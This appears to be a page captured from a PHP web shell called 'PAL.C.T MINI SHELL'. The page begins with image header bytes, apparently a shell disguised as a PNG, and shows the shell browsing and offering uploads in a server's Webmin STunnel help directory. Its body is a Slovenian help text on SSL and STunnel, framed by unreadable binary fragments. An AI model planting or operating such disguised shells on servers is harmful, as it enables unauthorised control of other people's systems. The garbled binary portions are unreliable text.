php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.sl.auto.html

<header> Uvod v SSL predore </header> SSL je protokol za šifriranje podatkov v povezavi TCP, ko potujejo po omrežju. Prvotno je bil razvit za zaščito prometa med spletnimi brskalniki in strežniki, vendar ga je mogoče uporabiti za šifriranje kakršnih koli podatkovnih tokov, ki bi bili običajno poslani preko protokola TCP. <p> Protokol SSL odjemalcem in strežnikom omogoča, da se medsebojno potrdijo, tako da je lahko odjemalec prepričan, da se resnično povezuje z gostiteljem, za katerega misli, da je. To se naredi s pomočjo potrdil, ki jih izda pooblaščeni organ, ki ga stranka prepozna (tako da jih je mogoče preveriti) in so povezana z določenim imenom gostitelja. Brez certifikatov bi lahko napadalec ponovno usmeril SSL povezavo do svojega strežnika in zajemal občutljive podatke odjemalca, za katerega meni, da govori s pravim strežnikom. <p> Napadalec lahko zajame in prebere vse podatke, ki potujejo po internetu nezašifrirano, z dostopom do enega od omrežij, skozi katera gre. Tudi podatki, ki potujejo med odjemalcem in strežniškim sistemom v omrežju LAN, lahko preprosto poslušate. Ko se povežete s telnet, FTP ali POP3 strežnikom, se vaše geslo pošlje po omrežju in ga napadalec lahko zajame. <p> SSL se lahko uporablja za zaščito podatkov v takšnih situacijah, vendar le, če ga podpirata tako odjemalec kot strežnik. Večina spletnih brskalnikov in poštnih odjemalcev lahko vzpostavi povezave s protokolom HTTP, POP3 in IMAP, šifrirane s SSL, vendar jih ne morejo sprejeti vsi spletni strežniki in POP3 strežniki. Zlasti POP3 je težko zaščititi, saj standardni strežnik, ki je priložen večini sistemov Unix, sploh ne podpira SSL. Na srečo, čeprav obstaja rešitev - STunnel. <p> STunnel je preprost program, ki pretvori nešifrirano povezavo v šifrirano s SSL. Običajno je nastavljen za zagon s super-strežnika, kot je inetd ali xinetd, in nato zaženite kakšen drug program, kot je strežnik POP3, ki ne podpira SSL. Ta zasnova mu omogoča, da zaščiti vsak strežnik, ki se običajno poganja pred inetd, na primer strežnike telnet, NNTP in IMAP. <p> Vseh strežnikov pa ni mogoče uporabiti zaščiteno s šifriranjem, ker ne obstaja noben odjemalec, ki bi jih uporabljal v načinu SSL. Na primer, še nikoli nisem slišal za odjemalca telnet ali FTP, ki lahko uporablja SSL, ker skupni paket SSH že omogoča šifrirane oddaljene prijave in prenose datotek. <p> Ta modul Webmin olajša nastavitev super-strežniških storitev, ki izvajajo STunnel, za zagon nekaterih strežniških programov. Čeprav je to mogoče storiti ročno z modulom Internet Services, je ta posebej zasnovan za nastavitev in konfiguriranje STunnela. Samodejno zazna, ali ste namestili inetd in / ali xinetd, prebere njihove konfiguracije, da preveri, ali obstajajo tuneli SSL, in jih doda, ko ustvarite nov predor. Če sta nameščena oba, se v konfiguracijo xinetd dodajo novi tuneli SSL, saj je po mojem mnenju boljši od obeh. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`